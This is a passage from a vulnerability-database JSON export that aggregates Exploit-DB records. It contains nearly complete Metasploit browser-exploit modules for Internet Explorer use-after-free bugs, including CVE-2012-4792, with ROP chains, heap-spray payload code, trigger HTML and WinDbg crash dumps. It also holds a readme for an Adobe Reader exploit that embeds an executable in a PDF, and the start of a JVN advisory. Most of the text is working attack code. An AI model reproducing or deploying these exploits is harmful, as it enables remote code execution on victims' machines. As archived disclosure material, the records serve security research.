0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n=end\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tprint_status(\"Using msvcrt ROP\")\r\n\t\t\tif t['Name'] =~ /Windows XP/\r\n\t\t\t\tstack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret\r\n\t\t\t\tstack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret\r\n\t\t\t\tstack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n\t\t\t\trop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})\r\n\t\t\telse\r\n\t\t\t\tstack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret\r\n\t\t\t\tstack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret\r\n\t\t\t\tstack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n\t\t\t\trop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"Using JRE ROP\")\r\n\t\t\tstack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret\r\n\t\t\tstack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret\r\n\t\t\tstack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n\t\t\trop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})\r\n\t\tend\r\n\r\n\t\treturn rop_payload\r\n\tend\r\n\r\n\tdef load_exploit_html(my_target, cli)\r\n\r\n\t\tp = get_payload(my_target, cli)\r\n\t\tjs = ie_heap_spray(my_target, p)\r\n\r\n\t\thtml = %Q|\r\n\t\t<!doctype html>\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<script>\r\n\t\t#{js}\r\n\r\n\t\tfunction exploit()\r\n\t\t{\r\n\t\t\tvar e0 = null;\r\n\t\t\tvar e1 = null;\r\n\t\t\tvar e2 = null;\r\n\t\t\tvar arrObject = new Array(3000);\r\n\t\t\tvar elmObject = new Array(500);\r\n\t\t\tfor (var i = 0; i < arrObject.length; i++)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i] = document.createElement('div');\r\n\t\t\t\tarrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n\t\t\t}\r\n\r\n\t\t\tfor (var i = 0; i < arrObject.length; i += 2)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i].className = null;\r\n\t\t\t}\r\n\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\tfor (var i = 0; i < elmObject.length; i ++)\r\n\t\t\t{\r\n\t\t\t\telmObject[i] = document.createElement('button');\r\n\t\t\t}\r\n\r\n\t\t\tfor (var i = 1; i < arrObject.length; i += 2)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i].className = null;\r\n\t\t\t}\r\n\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\ttry {\r\n\t\t\t\te0 = document.getElementById(\"a\");\r\n\t\t\t\te1 = document.getElementById(\"b\");\r\n\t\t\t\te2 = document.createElement(\"q\");\r\n\t\t\t\te1.applyElement(e2);\r\n\t\t\t\te1.appendChild(document.createElement('button'));\r\n\t\t\t\te1.applyElement(e0);\r\n\t\t\t\te2.outerText = \"\";\r\n\t\t\t\te2.appendChild(document.createElement('body'));\r\n\t\t\t} catch(e) { }\r\n\t\t\tCollectGarbage();\r\n\t\t\tfor(var i =0; i < 20; i++)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n\t\t\t}\r\n\t\t\tvar eip = window;\r\n\t\t\tvar data = \"https://www.google.com/settings/account\";\r\n\t\t\teip.location = unescape(\"%u0b30%u0c0c\" + data);\r\n\r\n\t\t}\r\n\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body onload=\"eval(exploit())\">\r\n\t\t<form id=\"a\">\r\n\t\t</form>\r\n\t\t<dfn id=\"b\">\r\n\t\t</dfn>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\treturn html\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tagent = request.headers['User-Agent']\r\n\t\turi = request.uri\r\n\t\tprint_status(\"Requesting: #{uri}\")\r\n\r\n\t\tmy_target = get_target(agent)\r\n\t\t# Avoid the attack if no suitable target found\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported, sending 404: #{agent}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = load_exploit_html(my_target, cli)\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\t\tprint_status(\"Sending HTML...\")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\tend\r\n\r\nend\r\n\r\n\r\n=begin\r\n(87c.f40): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\r\n0:008> k\r\nChildEBP RetAddr\r\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\r\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\r\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\r\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\r\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\r\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\r\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\r\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\r\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\r\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\r\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\r\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\r\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\r\n020bffec 00000000 kernel32!BaseThreadStart+0x37\r\n\r\n0:008> r\r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\r\n\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23754/"}, {"lastseen": "2016-02-02T21:48:26", "bulletinFamily": "exploit", "description": "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability. CVE-2012-4792. Remote exploit for windows platform", "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "id": "EDB-ID:23785", "href": "https://www.exploit-db.com/exploits/23785/", "type": "exploitdb", "title": "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::RopDb\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::IE,\r\n\t\t:ua_minver => \"8.0\",\r\n\t\t:ua_maxver => \"8.0\",\r\n\t\t:javascript => true,\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:rank => GoodRanking\r\n\t})\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in Microsoft Internet Explorer. A\r\n\t\t\t\tuse-after-free condition occurs when a CButton object is freed, but a reference\r\n\t\t\t\tis kept and used again during a page reload, an invalid memory that's controllable\r\n\t\t\t\tis used, and allows arbitrary code execution under the context of the user.\r\n\r\n\t\t\t\t\tPlease note: This vulnerability has been exploited in the wild targeting\r\n\t\t\t\tmainly China/Taiwan/and US-based computers.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'eromang',\r\n\t\t\t\t\t'mahmud ab rahman',\r\n\t\t\t\t\t'juan vazquez', #Metasploit\r\n\t\t\t\t\t'sinn3r', #Metasploit\r\n\t\t\t\t\t'Peter Vreugdenhil' #New trigger & new exploit technique\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-4792' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '154201' ],\r\n\t\t\t\t\t[ 'BID', '57070' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\r\n\t\t\t\t\t[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\r\n\t\t\t\t\t[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],\r\n\t\t\t\t\t[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],\r\n\t\t\t\t\t[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],\r\n\t\t\t\t\t[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Dec 27 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n\t\tie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n\t\tie_name = \"IE #{ie}\"\r\n\r\n\t\tcase nt\r\n\t\twhen '5.1'\r\n\t\t\tos_name = 'Windows XP SP3'\r\n\t\twhen '5.2'\r\n\t\t\tos_name = 'Windows Server 2003'\r\n\t\twhen '6.0'\r\n\t\t\tos_name = 'Windows Vista'\r\n\t\twhen '6.1'\r\n\t\t\tos_name = 'Windows 7'\r\n\t\telse\r\n\t\t\t# OS not supported\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\ttargets.each do |t|\r\n\t\t\tif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n\t\t\t\tprint_status(\"Target selected as: #{t.name}\")\r\n\t\t\t\treturn t\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn nil\r\n\tend\r\n\r\n\tdef ie8_smil(my_target, p)\r\n\r\n\t\tcase my_target['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tcase my_target.name\r\n\t\t\twhen 'IE 8 on Windows XP SP3'\r\n\t\t\t\talign_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\r\n\t\t\t\txchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\r\n\t\t\twhen 'IE 8 on Windows Server 2003'\r\n\t\t\t\talign_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\r\n\t\t\t\txchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\r\n\t\t\tend\r\n\t\telse\r\n\t\t\talign_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\r\n\t\t\txchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\r\n\t\tend\r\n\r\n\t\tpadding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\r\n\t\tjs_payload = Rex::Text.to_unescape(p)\r\n\r\n\t\tjs = %Q|\r\n\t\tunicorn = unescape(\"#{padding}\");\r\n\t\tfor (i=0; i < 3; i++) {\r\n\t\t\tunicorn += unescape(\"#{padding}\");\r\n\t\t}\r\n\r\n\t\tunicorn += unescape(\"#{js_payload}\");\r\n\r\n\t\tanimvalues = unescape(\"#{align_esp}\");\r\n\r\n\t\tfor (i=0; i < 0xDC/4; i++) {\r\n\t\t\tif (i == 0xDC/4-1) {\r\n\t\t\t\tanimvalues += unescape(\"#{xchg_esp}\");\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tanimvalues += unescape(\"#{align_esp}\");\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tanimvalues += unicorn;\r\n\r\n\t\tfor(i = 0; i < 21; i++) {\r\n\t\t\tanimvalues += \";cyan\";\r\n\t\t}\r\n\t\t|\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs = ::Rex::Exploitation::JSObfu.new(js)\r\n\t\t\tjs.obfuscate\r\n\t\tend\r\n\r\n\t\treturn js\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack(\"V\")[0].to_i\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"V\")[0].to_i\r\n\tend\r\n\r\n\tdef get_payload(t, cli)\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# No rop. Just return the payload.\r\n\t\treturn code if t['Rop'].nil?\r\n\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tcase t.name\r\n\t\t\twhen 'IE 8 on Windows XP SP3'\r\n\t\t\t\trop_gadgets =\r\n\t\t\t\t[\r\n\t\t\t\t\t0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n\t\t\t\t\t0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0xffffffff,\r\n\t\t\t\t\t0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n\t\t\t\t\t0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n\t\t\t\t\t0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n\t\t\t\t\t0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n\t\t\t\t\t0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n\t\t\t\t\t0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n\t\t\t\t].pack(\"V*\")\r\n\t\t\twhen 'IE 8 on Windows Server 2003'\r\n\t\t\t\trop_gadgets =\r\n\t\t\t\t[\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\t0x77ba1114, # <- *&VirtualProtect()\r\n\t\t\t\t\t0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\r\n\t\t\t\t\tjunk,\r\n\t\t\t\t\t0x77bb0c86, # XCHG EAX,ESI # RETN\r\n\t\t\t\t\t0x77bc9801, # POP EBP # RETN\r\n\t\t\t\t\t0x77be2265, # ptr to 'push esp # ret'\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\t0x03C0990F,\r\n\t\t\t\t\t0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)\r\n\t\t\t\t\t0x77bb48d3, # POP EBX, RET\r\n\t\t\t\t\t0x77bf21e0, # .data\r\n\t\t\t\t\t0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\r\n\t\t\t\t\t0x77bbfc02, # POP ECX # RETN\r\n\t\t\t\t\t0x77bef001, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t\t0x77bd8c04, # POP EDI # RETN\r\n\t\t\t\t\t0x77bd8c05, # ROP NOP (-> edi)\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\t0x03c0984f,\r\n\t\t\t\t\t0x77bdd441, # SUB EAX, 03c0940f\r\n\t\t\t\t\t0x77bb8285, # XCHG EAX,EDX # RETN\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\tnop,\r\n\t\t\t\t\t0x77be6591 # PUSHAD # ADD AL,0EF # RETN\r\n\t\t\t\t].pack(\"V*\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\trop_gadgets =\r\n\t\t\t[\r\n\t\t\t\t0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n\t\t\t\t0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)\r\n\t\t\t\t0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]\r\n\t\t\t\t0x7c3415a2, # JMP [EAX] [msvcr71.dll]\r\n\t\t\t\t0xffffffff,\r\n\t\t\t\t0x7c376402, # skip 4 bytes [msvcr71.dll]\r\n\t\t\t\t0x7c351e05, # NEG EAX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c344f87, # POP EDX # RETN [msvcr71.dll]\r\n\t\t\t\t0xffffffc0, # Value to negate, will become 0x00000040\r\n\t\t\t\t0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c34d201, # POP ECX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c38b001, # &Writable location [msvcr71.dll]\r\n\t\t\t\t0x7c347f97, # POP EAX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]\r\n\t\t\t\t0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]\r\n\t\t\t\t# rop chain generated with mona.py\r\n\t\t\t].pack(\"V*\")\r\n\t\tend\r\n\r\n\t\trop_payload = rop_gadgets\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\trop_payload << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n\t\telse\r\n\t\t\trop_payload << \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\r\n\t\tend\r\n\t\trop_payload << code\r\n\t\trop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt\r\n\r\n\t\treturn rop_payload\r\n\tend\r\n\r\n\tdef load_exploit_html(my_target, cli)\r\n\r\n\t\tp = get_payload(my_target, cli)\r\n\t\tjs = ie8_smil(my_target, p)\r\n\r\n\t\thtml = %Q|\r\n\t\t<!doctype html>\r\n\t\t<HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\r\n\t\t<head>\r\n\t\t<meta>\r\n\t\t\t<?IMPORT namespace=\"t\" implementation=\"#default#time2\">\r\n\t\t</meta>\r\n\r\n\t\t<script>\r\n\t\tfunction helloWorld()\r\n\t\t{\r\n\t\t\te_form = document.getElementById(\"formelm\");\r\n\t\t\te_div = document.getElementById(\"divelm\");\r\n\r\n\t\t\t#{js}\r\n\r\n\t\t\tfor(i =0; i < 20; i++) {\r\n\t\t\t\tdocument.createElement('button');\r\n\t\t\t}\r\n\t\t\te_div.appendChild(document.createElement('button'))\r\n\t\t\te_div.firstChild.applyElement(e_form);\r\n\r\n\t\t\te_div.innerHTML = \"\"\r\n\t\t\te_div.appendChild(document.createElement('body'));\r\n\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\ttry {\r\n\t\t\t\ta = document.getElementById('myanim');\r\n\t\t\t\ta.values = animvalues;\r\n\t\t\t}\r\n\t\t\tcatch(e) {}\r\n\t\t}\r\n\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body onload=\"eval(helloWorld())\">\r\n\t\t<t:ANIMATECOLOR id=\"myanim\"/>\r\n\t\t<div id=\"divelm\"></div>\r\n\t\t<form id=\"formelm\">\r\n\t\t</form>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\treturn html\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tagent = request.headers['User-Agent']\r\n\t\turi = request.uri\r\n\t\tprint_status(\"Requesting: #{uri}\")\r\n\r\n\t\tmy_target = get_target(agent)\r\n\t\t# Avoid the attack if no suitable target found\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported, sending 404: #{agent}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = load_exploit_html(my_target, cli)\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\t\tprint_status(\"Sending HTML...\")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\tend\r\n\r\nend\r\n\r\n\r\n=begin\r\n(87c.f40): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\r\n0:008> k\r\nChildEBP RetAddr\r\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\r\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\r\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\r\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\r\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\r\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\r\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\r\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\r\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\r\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\r\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\r\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\r\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\r\n020bffec 00000000 kernel32!BaseThreadStart+0x37\r\n\r\n0:008> r\r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23785/"}, {"lastseen": "2016-02-03T11:19:27", "bulletinFamily": "exploit", "description": "Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS. CVE-2013-0640. Local exploit for windows platform", "modified": "2013-11-28T00:00:00", "published": "2013-11-28T00:00:00", "id": "EDB-ID:29881", "href": "https://www.exploit-db.com/exploits/29881/", "type": "exploitdb", "title": "Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS", "sourceData": "CVE-2013-0640/1\r\nSomehow, our script got on to the Russian forums :/\r\n\r\n@w3bd3vil and @abh1sek\r\n\r\nExploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz\r\n\r\nAdobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS\r\n=================================================================\r\n\r\nSupported Adobe Reader Versions:\r\n\r\n* 11.0.1\r\n* 11.0.0\r\n\r\n* 10.1.5\r\n* 10.1.4\r\n* 10.1.3\r\n* 10.1.2\r\n* 10.1\r\n\r\n* 9.5\r\n\r\nTested on:\r\n\r\n* Windows 7 (32 bit)\r\n* Windows 7 (64 bit)\r\n* Windows XP\r\n\r\nScript Requirements:\r\n\r\n* Run on Windows :-)\r\n* Ruby 1.9.x (http://rubyforge.org/frs/download.php/76752/rubyinstaller-1.9.3-p385.exe)\r\n* Gems: origami, metasm (In command prompt type, gem install metasm && gem install origami -v \"=1.2.5\")\r\n\r\nFYI:\r\na. It's a rip, of the original exploit.\r\nb. Works most of the times.\r\nc. We never really got into completing our script options though.\r\n\r\nruby xfa_MAGIC.rb -h\r\nUsage: xfa_MAGIC.rb [options]\r\n -i, --input [FILE] Input PDF. If provided, exploit will be injected into it (optional)\r\n -p, --payload [FILE] PE executable to embed in the payload\r\n --low-mem Use Heap spray suitable for low memory environment\r\n -o, --output [FILE] File path to write output PDF\r\n -h, --help Show help\r\n(Some commands are not supported at the moment)\r\n\r\nruby xfa_MAGIC.rb -p example.exe -o poc.pdf", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/29881/"}], "jvn": [{"lastseen": "2019-05-29T17:21:43", "bulletinFamily": "info", "description": "\n ## Description\n\nInternet Explorer contains a vulnerability that may allow arbitrary code execution. \n \nAccording to Microsoft, targeted attacks that attempt to exploit this vulnerability have been confirmed but are limited. \n\n\n ## Impact\n\nIf a user views a specially crafted web page, an arbitrary code may be executed. \n\n\n ## Solution\n\n**Apply an update** \nApply [Cumulative Security Update for Internet Explorer (2879017)](<http://technet.microsoft.com/en-us/security/bulletin/ms13-080>) according to the information provided by Microsoft. \n \n**Apply a workaround \n**The 